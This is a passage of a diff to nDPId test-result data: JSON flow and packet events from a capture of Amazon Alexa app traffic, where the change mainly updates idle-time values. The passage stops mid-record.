-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":962,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":2,"flow_last_seen":1490976071322,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071322,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw3TJAAOcGwsc0XuiGrBAq2ABQwcY3D6dGIEe1bHASH\/76HQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":963,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":1490976071324,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071324,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo70lAAEAGV7msECrYNF7ohsHGAFAgR7VsNw+nR1AQAVdEjwAA"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":964,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071237,"flow_last_seen":1490976071324,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":780,"flow_tot_l4_payload_len":780,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1490976071324,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49606,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071349,"flow_last_seen":1490976071349,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071349,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":965,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1490976071349,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071349,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lMZAAEAGsiisECrYNF7ohrJ\/Abuhu87oAAAAAKAC\/\/\/ULgAAAgQFtAQCCAoA9louAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":966,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":2,"flow_last_seen":1490976071360,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071360,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwaLpAAOcGN0A0XuiGrBAq2AG7sn5peFkmyPjA43ASH\/5viQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":967,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":1490976071361,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071361,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomslAAEAGrDmsECrYNF7ohrJ+AbvI+MDjaXhZJ1AQAVe5+gAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":968,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071306,"flow_last_seen":1490976071362,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976071362,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1490976071363,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071363,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWSpAAOcGRtA0XuiGrBAq2AG7sn0V5Ch+kScxUnASH\/67KQAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":970,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1490976071364,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071364,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoa3pAAEAG24isECrYNF7ohrJ9AbuRJzFSFeQof1AQAVcFmwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":971,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071286,"flow_last_seen":1490976071365,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071365,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071380,"flow_last_seen":1490976071380,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071380,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":972,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1490976071380,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071380,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Ky9AAEAGG8CsECrYNF7ohrKAAbueQXEdAAAAAKAC\/\/81bwAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071385,"flow_last_seen":1490976071385,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071385,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":973,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1490976071385,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071385,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fzdAAEAGx7esECrYNF7ohrKBAbt+UyUFAAAAAKAC\/\/+hdAAAAgQFtAQCCAoA9loyAAAAAAEDAwg="} 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1490976071389,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976071389,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl2DBAAEARtV2sECoBrBAq2AA1YfkAUYstBuuBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAADUACwhwaXRhbmd1acASwC4AAQABAAAANQAENF7ohg=="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":974,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976071389,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} -01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 